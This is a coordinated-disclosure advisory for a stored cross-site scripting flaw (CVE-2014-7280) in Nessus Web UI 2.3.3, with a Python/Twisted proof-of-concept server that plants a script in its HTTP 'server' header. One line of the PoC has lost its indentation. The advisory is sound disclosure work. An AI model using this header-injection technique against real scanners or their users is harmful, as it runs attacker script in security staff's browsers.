Nessus Web UI 2.3.3 Cross Site Scripting Vulnerability



EKU-ID: 4297 CVE: 2014-7280 OSVDB-ID:
Author: Frank Lycops Published: 2014-10-09 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


Nessus Web UI 2.3.3: Stored XSS
=========================================================
  
CVE number: CVE-2014-7280
Permalink: http://www.thesecurityfactory.be/permalink/nessus-stored-xss.html
Vendor advisory: http://www.tenable.com/security/tns-2014-08
  
-- Info --
  
Nessus is a proprietary comprehensive vulnerability scanner which is developed by Tenable Network Security. Tenable Network Security estimates that it is used by over 75,000 organisations worldwide.
  
-- Affected version -
  
Web UI version 2.3.3, Build #83
  
-- Vulnerability details --
  
By setting up a malicious web server that returns a specially crafted host header, an attacker is able to execute javascript code on the machine of the person performing a vulnerability scan of the web server. No escaping on javascript code is being performed when passing the server header to the affected Web UI version via a plugin.
The javascript code will be stored in the backend database, and will execute every time the target views a report that returns the server header.
  
-- POC --
  
#!/usr/bin/env python
import sys
from twisted.web import server, resource
from twisted.internet import reactor
from twisted.python import log
  
class Site(server.Site):
    def getResourceFor(self, request):
        request.setHeader('server', '<script>alert(1)</script>SomeServer')
        return server.Site.getResourceFor(self, request)
  
class HelloResource(resource.Resource):
    isLeaf = True
    numberRequests = 0
  
    def render_GET(self, request):
        self.numberRequests += 1
        request.setHeader("content-type", "text/plain")
return "theSecurityFactory Nessus POC"
  
log.startLogging(sys.stderr)
reactor.listenTCP(8080, Site(HelloResource()))
reactor.run()
  
-- Solution --
  
This issue has been fixed as of version 2.3.4 of the WEB UI.
  
  
-- Timeline --
  
2014-06-12   Release of Web UI version 2.3.3, build#83
  
2014-06-13        Vulnerability discovered and creation of POC
  
2014-06-13        Vulnerability responsibly reported to vendor
  
2014-06-13        Vulnerability acknowledged by vendor
  
2014-06-13        Release of Web UI version 2.3.4, build#85
  
2014-XX-XX        Advisory published in coordination with vendor
  
-- Credit --
  
Frank Lycops
Frank.lycops [at] thesecurityfactory.be